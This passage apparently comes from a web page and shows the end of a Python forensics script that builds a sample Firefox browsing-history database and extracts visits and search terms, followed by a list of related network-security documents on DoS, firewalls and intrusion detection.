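        CREATE TABLE moz_historyvisits (id INTEGER PRIMARY KEY, from_visit INTEGER,
                                        place_id INTEGER, visit_date INTEGER, visit_type INTEGER);
    """)
    base = 1_449_000_000_000_000          # 2015-12-01T20:00:00Z expressed as PRTime
    places = [
        (1, "https://www.google.com/search?q=computer+forensics", "computer forensics - Google Search", 1),
        (2, "https://example.org/", "Example Domain", 2),
        (3, "https://duckduckgo.com/?q=nmap+syn+scan", "nmap syn scan at DuckDuckGo", 1),
    ]
    visits = [(1, 0, 1, base, 1), (2, 1, 2, base + 60_000_000, 1),
              (3, 0, 3, base + 120_000_000, 1), (4, 0, 2, base + 300_000_000, 1)]
    con.executemany("INSERT INTO moz_places VALUES (?,?,?,?,?)",
                    [(i, u, t, n, max(v[3] for v in visits if v[2] == i)) for i, u, t, n in places])
    con.executemany("INSERT INTO moz_historyvisits VALUES (?,?,?,?,?)", visits)
    return con


if __name__ == "__main__":
    rows = history(build_sample_db())
    for r in rows:
        print(r["visited"], r["url"], r["visit_count"])
    print(search_terms(rows))
```

The from_visit column (kept in the sample) links a visit to the one it was reached from, so the same join can be extended to rebuild click chains; the timestamps come out in UTC and must be shifted to the machine's time zone before being matched against local log entries.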


More information

Network Security CS 192

Network Security CS 192 Network Security CS 192 Network Scanning (Idlescan) Department of Computer Science George Washington University Jonathan Stanton 1 Today s topics Discussion of new DNS flaws Network Scanning (Idlescan)

More information

SY0-201. system so that an unauthorized individual can take over an authorized session, or to disrupt service to authorized users.

SY0-201. system so that an unauthorized individual can take over an authorized session, or to disrupt service to authorized users. system so that an unauthorized individual can take over an authorized session, or to disrupt service to authorized users. From a high-level standpoint, attacks on computer systems and networks can be grouped

More information

Denial of Service Attacks

Denial of Service Attacks 2 Denial of Service Attacks : IT Security Sirindhorn International Institute of Technology Thammasat University Prepared by Steven Gordon on 13 August 2013 its335y13s2l06, Steve/Courses/2013/s2/its335/lectures/malicious.tex,

More information

Security Threat Kill Chain What log data would you need to identify an APT and perform forensic analysis?

Security Threat Kill Chain What log data would you need to identify an APT and perform forensic analysis? Security Threat Kill Chain What log data would you need to identify an APT and perform forensic analysis? This paper presents a scenario in which an attacker attempts to hack into the internal network

More information

Brocade NetIron Denial of Service Prevention

Brocade NetIron Denial of Service Prevention White Paper Brocade NetIron Denial of Service Prevention This white paper documents the best practices for Denial of Service Attack Prevention on Brocade NetIron platforms. Table of Contents Brocade NetIron

More information

co Characterizing and Tracing Packet Floods Using Cisco R

co Characterizing and Tracing Packet Floods Using Cisco R co Characterizing and Tracing Packet Floods Using Cisco R Table of Contents Characterizing and Tracing Packet Floods Using Cisco Routers...1 Introduction...1 Before You Begin...1 Conventions...1 Prerequisites...1

More information

FIREWALLS. Firewall: isolates organization s internal net from larger Internet, allowing some packets to pass, blocking others

FIREWALLS. Firewall: isolates organization s internal net from larger Internet, allowing some packets to pass, blocking others FIREWALLS FIREWALLS Firewall: isolates organization s internal net from larger Internet, allowing some packets to pass, blocking others FIREWALLS: WHY Prevent denial of service attacks: SYN flooding: attacker

More information

https://elearn.zdresearch.com https://training.zdresearch.com/course/pentesting

https://elearn.zdresearch.com https://training.zdresearch.com/course/pentesting https://elearn.zdresearch.com https://training.zdresearch.com/course/pentesting Chapter 1 1. Introducing Penetration Testing 1.1 What is penetration testing 1.2 Different types of test 1.2.1 External Tests

More information

Firewall Firewall August, 2003

Firewall Firewall August, 2003 Firewall August, 2003 1 Firewall and Access Control This product also serves as an Internet firewall, not only does it provide a natural firewall function (Network Address Translation, NAT), but it also

More information

Firewalls Netasq. Security Management by NETASQ

Firewalls Netasq. Security Management by NETASQ Firewalls Netasq Security Management by NETASQ 1. 0 M a n a g e m e n t o f t h e s e c u r i t y b y N E T A S Q 1 pyright NETASQ 2002 Security Management is handled by the ASQ, a Technology developed

More information

Project 4: (E)DoS Attacks

Project 4: (E)DoS Attacks Project4 EDoS Instructions 1 Project 4: (E)DoS Attacks Secure Systems and Applications 2009 Ben Smeets (C) Dept. of Electrical and Information Technology, Lund University, Sweden Introduction A particular

More information

APNIC elearning: Network Security Fundamentals. 20 March 2013 10:30 pm Brisbane Time (GMT+10)

APNIC elearning: Network Security Fundamentals. 20 March 2013 10:30 pm Brisbane Time (GMT+10) APNIC elearning: Network Security Fundamentals 20 March 2013 10:30 pm Brisbane Time (GMT+10) Introduction Presenter/s Nurul Islam Roman Senior Training Specialist nurul@apnic.net Specialties: Routing &

More information

Solution of Exercise Sheet 5

Solution of Exercise Sheet 5 Foundations of Cybersecurity (Winter 15/16) Prof. Dr. Michael Backes CISPA / Saarland University saarland university computer science Protocols = {????} Client Server IP Address =???? IP Address =????

More information

IDS 4.0 Roadshow. Module 1- IDS Technology Overview. 2003, Cisco Systems, Inc. All rights reserved. IDS Roadshow

IDS 4.0 Roadshow. Module 1- IDS Technology Overview. 2003, Cisco Systems, Inc. All rights reserved. IDS Roadshow IDS 4.0 Roadshow Module 1- IDS Technology Overview Agenda Network Security Network Security Policy Management Protocols The Security Wheel IDS Terminology IDS Technology HIDS and NIDS IDS Communication

More information

1 hours, 30 minutes, 38 seconds Heavy scan. All scanned network resources. Copyright 2001, FTP access obtained

1 hours, 30 minutes, 38 seconds Heavy scan. All scanned network resources. Copyright 2001, FTP access obtained home Network Vulnerabilities Detail Report Grouped by Vulnerability Report Generated by: Symantec NetRecon 3.5 Licensed to: X Serial Number: 0182037567 Machine Scanned from: ZEUS (192.168.1.100) Scan Date:

More information

Development of a Network Intrusion Detection System

Development of a Network Intrusion Detection System Development of a Network Intrusion Detection System (I): Agent-based Design (FLC1) (ii): Detection Algorithm (FLC2) Supervisor: Dr. Korris Chung Please visit my personal homepage www.comp.polyu.edu.hk/~cskchung/fyp04-05/

More information

Safeguards Against Denial of Service Attacks for IP Phones

Safeguards Against Denial of Service Attacks for IP Phones W H I T E P A P E R Denial of Service (DoS) attacks on computers and infrastructure communications systems have been reported for a number of years, but the accelerated deployment of Voice over IP (VoIP)

More information

Chapter 28 Denial of Service (DoS) Attack Prevention

Chapter 28 Denial of Service (DoS) Attack Prevention Chapter 28 Denial of Service (DoS) Attack Prevention Introduction... 28-2 Overview of Denial of Service Attacks... 28-2 IP Options... 28-2 LAND Attack... 28-3 Ping of Death Attack... 28-4 Smurf Attack...

More information

Distributed Denial of Service(DDoS) Attack Techniques and Prevention on Cloud Environment

Distributed Denial of Service(DDoS) Attack Techniques and Prevention on Cloud Environment Distributed Denial of Service(DDoS) Attack Techniques and Prevention on Cloud Environment Keyur Chauhan 1,Vivek Prasad 2 1 Student, Institute of Technology, Nirma University (India) 2 Assistant Professor,

More information

Network Scanning. What is a Network scanner? Why are scanners needed? How do scanners do? Which scanner does the market provide?

Network Scanning. What is a Network scanner? Why are scanners needed? How do scanners do? Which scanner does the market provide? Network Scanning What is a Network scanner? Why are scanners needed? How do scanners do? Which scanner does the market provide? Where will our research go? Page : 1 Function - attacker view What hosts

More information

IntruPro TM IPS. Inline Intrusion Prevention. White Paper

IntruPro TM IPS. Inline Intrusion Prevention. White Paper IntruPro TM IPS Inline Intrusion Prevention White Paper White Paper Inline Intrusion Prevention Introduction Enterprises are increasingly looking at tools that detect network security breaches and alert

More information

Secure Software Programming and Vulnerability Analysis

Secure Software Programming and Vulnerability Analysis Secure Software Programming and Vulnerability Analysis Christopher Kruegel chris@auto.tuwien.ac.at http://www.auto.tuwien.ac.at/~chris Operations and Denial of Service Secure Software Programming 2 Overview

More information

Lecture 5: Network Attacks I. Course Admin

Lecture 5: Network Attacks I. Course Admin Lecture 5: Network Attacks I CS 336/536: Computer Network Security Fall 2013 Nitesh Saxena Adopted from previous lectures by Keith Ross Course Admin HW/Lab 1 Due Coming Monday 11am Lab sessions are active

More information

How To Classify A Dnet Attack

How To Classify A Dnet Attack Analysis of Computer Network Attacks Nenad Stojanovski 1, Marjan Gusev 2 1 Bul. AVNOJ 88-1/6, 1000 Skopje, Macedonia Nenad.stojanovski@gmail.com 2 Faculty of Natural Sciences and Mathematics, Ss. Cyril

More information

Firewalls. configuring a sophisticated GNU/Linux firewall involves understanding

Firewalls. configuring a sophisticated GNU/Linux firewall involves understanding Firewalls slide 1 configuring a sophisticated GNU/Linux firewall involves understanding iptables iptables is a package which interfaces to the Linux kernel and configures various rules for allowing packets

More information

Stop that Big Hack Attack Protecting Your Network from Hackers. www.lauraknapp.com

Stop that Big Hack Attack Protecting Your Network from Hackers. www.lauraknapp.com Stop that Big Hack Attack Protecting Your Network from Hackers Laura Jeanne Knapp Technical Evangelist 1-919-224-2205 laura@lauraknapp.com www.lauraknapp.com NetSec_ 010 Agenda Components of security threats

More information

Networks: IP and TCP. Internet Protocol

Networks: IP and TCP. Internet Protocol Networks: IP and TCP 11/1/2010 Networks: IP and TCP 1 Internet Protocol Connectionless Each packet is transported independently from other packets Unreliable Delivery on a best effort basis No acknowledgments

More information

An Introduction to Nmap with a Focus on Information Gathering. Ionuț Ambrosie

An Introduction to Nmap with a Focus on Information Gathering. Ionuț Ambrosie An Introduction to Nmap with a Focus on Information Gathering Ionuț Ambrosie January 12, 2015 During the information gathering phase of a penetration test, tools such as Nmap can be helpful in allowing

More information

Firewalls and Intrusion Detection

Firewalls and Intrusion Detection Firewalls and Intrusion Detection What is a Firewall? A computer system between the internal network and the rest of the Internet A single computer or a set of computers that cooperate to perform the firewall

More information

Network Security Fundamentals

Network Security Fundamentals APNIC elearning: Network Security Fundamentals 27 November 2013 04:30 pm Brisbane Time (GMT+10) Introduction Presenter Sheryl Hermoso Training Officer sheryl@apnic.net Specialties: Network Security IPv6

More information

Lecture 6: Network Attacks II. Course Admin

Lecture 6: Network Attacks II. Course Admin Lecture 6: Network Attacks II CS 336/536: Computer Network Security Fall 2014 Nitesh Saxena Adopted from previous lectures by Keith Ross, and Gene Tsudik Course Admin HW/Lab 1 We are grading (should return

More information

Network Security. Dr. Ihsan Ullah. Department of Computer Science & IT University of Balochistan, Quetta Pakistan. April 23, 2015

Network Security. Dr. Ihsan Ullah. Department of Computer Science & IT University of Balochistan, Quetta Pakistan. April 23, 2015 Network Security Dr. Ihsan Ullah Department of Computer Science & IT University of Balochistan, Quetta Pakistan April 23, 2015 1 / 24 Secure networks Before the advent of modern telecommunication network,

More information

CYBER ATTACKS EXPLAINED: PACKET CRAFTING

CYBER ATTACKS EXPLAINED: PACKET CRAFTING CYBER ATTACKS EXPLAINED: PACKET CRAFTING Protect your FOSS-based IT infrastructure from packet crafting by learning more about it. In the previous articles in this series, we explored common infrastructure

More information

Traffic Analysis. CSF: Forensics Cyber-Security. Part II.B. Techniques and Tools: Network Forensics. Fall 2015 Nuno Santos

Traffic Analysis. CSF: Forensics Cyber-Security. Part II.B. Techniques and Tools: Network Forensics. Fall 2015 Nuno Santos Traffic Analysis Part II.B. Techniques and Tools: Network Forensics CSF: Forensics Cyber-Security Fall 2015 Nuno Santos Summary } Packet and flow analysis } Network intrusion detection } NetFlow investigations

More information

Network/Internet Forensic and Intrusion Log Analysis

Network/Internet Forensic and Intrusion Log Analysis Course Introduction Enterprises all over the globe are compromised remotely by malicious hackers each day. Credit card numbers, proprietary information, account usernames and passwords, and a wealth of

More information

A43. Modern Hacking Techniques and IP Security. By Shawn Mullen. Las Vegas, NV IBM TRAINING. IBM Corporation 2006

A43. Modern Hacking Techniques and IP Security. By Shawn Mullen. Las Vegas, NV IBM TRAINING. IBM Corporation 2006 IBM TRAINING A43 Modern Hacking Techniques and IP Security By Shawn Mullen Las Vegas, NV 2005 CSI/FBI US Computer Crime and Computer Security Survey 9 out of 10 experienced computer security incident in

More information

Content Distribution Networks (CDN)

Content Distribution Networks (CDN) 229 Content Distribution Networks (CDNs) A content distribution network can be viewed as a global web replication. main idea: each replica is located in a different geographic area, rather then in the

More information

What is a Firewall? A choke point of control and monitoring Interconnects networks with differing trust Imposes restrictions on network services

What is a Firewall? A choke point of control and monitoring Interconnects networks with differing trust Imposes restrictions on network services Firewalls What is a Firewall? A choke point of control and monitoring Interconnects networks with differing trust Imposes restrictions on network services only authorized traffic is allowed Auditing and

More information

Evading Infrastructure Security Mohamed Bedewi Penetration Testing Consultant

Evading Infrastructure Security Mohamed Bedewi Penetration Testing Consultant Evading Infrastructure Security Mohamed Bedewi Penetration Testing Consultant What infrastructure security really means? Infrastructure Security is Making sure that your system services are always running

More information

Network Defense Tools

Network Defense Tools Network Defense Tools Prepared by Vanjara Ravikant Thakkarbhai Engineering College, Godhra-Tuwa +91-94291-77234 www.cebirds.in, www.facebook.com/cebirds ravikantvanjara@gmail.com What is Firewall? A firewall

More information

DDoS Attacks: The Latest Threat to Availability. Dr. Bill Highleyman Managing Editor Availability Digest

DDoS Attacks: The Latest Threat to Availability. Dr. Bill Highleyman Managing Editor Availability Digest DDoS Attacks: The Latest Threat to Availability Dr. Bill Highleyman Managing Editor Availability Digest The Anatomy of a DDoS Attack Sombers Associates, Inc. 2013 2 What is a Distributed Denial of Service

More information

Firewalls. Firewalls. Idea: separate local network from the Internet 2/24/15. Intranet DMZ. Trusted hosts and networks. Firewall.

Firewalls. Firewalls. Idea: separate local network from the Internet 2/24/15. Intranet DMZ. Trusted hosts and networks. Firewall. Firewalls 1 Firewalls Idea: separate local network from the Internet Trusted hosts and networks Firewall Intranet Router DMZ Demilitarized Zone: publicly accessible servers and networks 2 1 Castle and

More information

SECURING APACHE : DOS & DDOS ATTACKS - I

SECURING APACHE : DOS & DDOS ATTACKS - I SECURING APACHE : DOS & DDOS ATTACKS - I In this part of the series, we focus on DoS/DDoS attacks, which have been among the major threats to Web servers since the beginning of the Web 2.0 era. Denial

More information

Network Forensics: Log Analysis

Network Forensics: Log Analysis Network Forensics: Analysis Richard Baskerville Agenda P Terms & -based Tracing P Application Layer Analysis P Lower Layer Analysis Georgia State University 1 2 Two Important Terms PPromiscuous Mode

More information

How do I get to www.randomsite.com?

How do I get to www.randomsite.com? Networking Primer* *caveat: this is just a brief and incomplete introduction to networking to help students without a networking background learn Network Security. How do I get to www.randomsite.com? Local

More information

Firewalls. Test your Firewall knowledge. Test your Firewall knowledge (cont) (March 4, 2015)

Firewalls. Test your Firewall knowledge. Test your Firewall knowledge (cont) (March 4, 2015) s (March 4, 2015) Abdou Illia Spring 2015 Test your knowledge Which of the following is true about firewalls? a) A firewall is a hardware device b) A firewall is a software program c) s could be hardware

More information

Network Security. Marcus Bendtsen Institutionen för Datavetenskap (IDA) Avdelningen för Databas- och Informationsteknik (ADIT)

Network Security. Marcus Bendtsen Institutionen för Datavetenskap (IDA) Avdelningen för Databas- och Informationsteknik (ADIT) Network Security ICMP, TCP, DNS, Scanning Marcus Bendtsen Institutionen för Datavetenskap (IDA) Avdelningen för Databas- och Informationsteknik (ADIT) Agenda A couple of examples of network protocols that

More information

1. LAB SNIFFING LAB ID: 10

1. LAB SNIFFING LAB ID: 10 H E R A LAB ID: 10 SNIFFING Sniffing in a switched network ARP Poisoning Analyzing a network traffic Extracting files from a network trace Stealing credentials Mapping/exploring network resources 1. LAB

More information

Attacks and Defense. Phase 1: Reconnaissance

Attacks and Defense. Phase 1: Reconnaissance Attacks and Defense Phase 1: Reconnaissance Phase 2: Port Scanning Phase 3: Gaining Access Using Application and Operating System Using Networks Phase 1: Reconnaissance Known as information gathering.

More information

10 Configuring Packet Filtering and Routing Rules

10 Configuring Packet Filtering and Routing Rules Blind Folio 10:1 10 Configuring Packet Filtering and Routing Rules CERTIFICATION OBJECTIVES 10.01 Understanding Packet Filtering and Routing 10.02 Creating and Managing Packet Filtering 10.03 Configuring

More information

Chapter 8 Router and Network Management

Chapter 8 Router and Network Management Chapter 8 Router and Network Management This chapter describes how to use the network management features of your ProSafe Dual WAN Gigabit Firewall with SSL & IPsec VPN. These features can be found by

More information

Intrusion Detection System Based Network Using SNORT Signatures And WINPCAP

Intrusion Detection System Based Network Using SNORT Signatures And WINPCAP Intrusion Detection System Based Network Using SNORT Signatures And WINPCAP Aakanksha Vijay M.tech, Department of Computer Science Suresh Gyan Vihar University Jaipur, India Mrs Savita Shiwani Head Of

More information

Linux MDS Firewall Supplement

Linux MDS Firewall Supplement Linux MDS Firewall Supplement Table of Contents Introduction... 1 Two Options for Building a Firewall... 2 Overview of the iptables Command-Line Utility... 2 Overview of the set_fwlevel Command... 2 File

More information

Denial of Service. Tom Chen SMU tchen@engr.smu.edu

Denial of Service. Tom Chen SMU tchen@engr.smu.edu Denial of Service Tom Chen SMU tchen@engr.smu.edu Outline Introduction Basics of DoS Distributed DoS (DDoS) Defenses Tracing Attacks TC/BUPT/8704 SMU Engineering p. 2 Introduction What is DoS? 4 types

More information

JK0 015 CompTIA E2C Security+ (2008 Edition) Exam

JK0 015 CompTIA E2C Security+ (2008 Edition) Exam JK0 015 CompTIA E2C Security+ (2008 Edition) Exam Version 4.1 QUESTION NO: 1 Which of the following devices would be used to gain access to a secure network without affecting network connectivity? A. Router

More information

Security vulnerabilities in the Internet and possible solutions

Security vulnerabilities in the Internet and possible solutions Security vulnerabilities in the Internet and possible solutions 1. Introduction The foundation of today's Internet is the TCP/IP protocol suite. Since the time when these specifications were finished in

More information

PROFESSIONAL SECURITY SYSTEMS

PROFESSIONAL SECURITY SYSTEMS PROFESSIONAL SECURITY SYSTEMS Security policy, active protection against network attacks and management of IDP Introduction Intrusion Detection and Prevention (IDP ) is a new generation of network security

More information

CSE 127: Computer Security. Network Security. Kirill Levchenko

CSE 127: Computer Security. Network Security. Kirill Levchenko CSE 127: Computer Security Network Security Kirill Levchenko December 4, 2014 Network Security Original TCP/IP design: Trusted network and hosts Hosts and networks administered by mutually trusted parties

More information

The Trivial Cisco IP Phones Compromise

The Trivial Cisco IP Phones Compromise Security analysis of the implications of deploying Cisco Systems SIP-based IP Phones model 7960 Ofir Arkin Founder The Sys-Security Group ofir@sys-security.com http://www.sys-security.com September 2002

More information

Deployment of Snort IDS in SIP based VoIP environments

Deployment of Snort IDS in SIP based VoIP environments Deployment of Snort IDS in SIP based VoIP environments Jiří Markl, Jaroslav Dočkal Jaroslav.Dockal@unob.cz K-209 Univerzita obrany Kounicova 65, 612 00 Brno Czech Republic Abstract This paper describes

More information

Strategies to Protect Against Distributed Denial of Service (DD

Strategies to Protect Against Distributed Denial of Service (DD Strategies to Protect Against Distributed Denial of Service (DD Table of Contents Strategies to Protect Against Distributed Denial of Service (DDoS) Attacks...1 Introduction...1 Understanding the Basics

More information

Firewalls. Chapter 3

Firewalls. Chapter 3 Firewalls Chapter 3 1 Border Firewall Passed Packet (Ingress) Passed Packet (Egress) Attack Packet Hardened Client PC Internet (Not Trusted) Hardened Server Dropped Packet (Ingress) Log File Internet Border

More information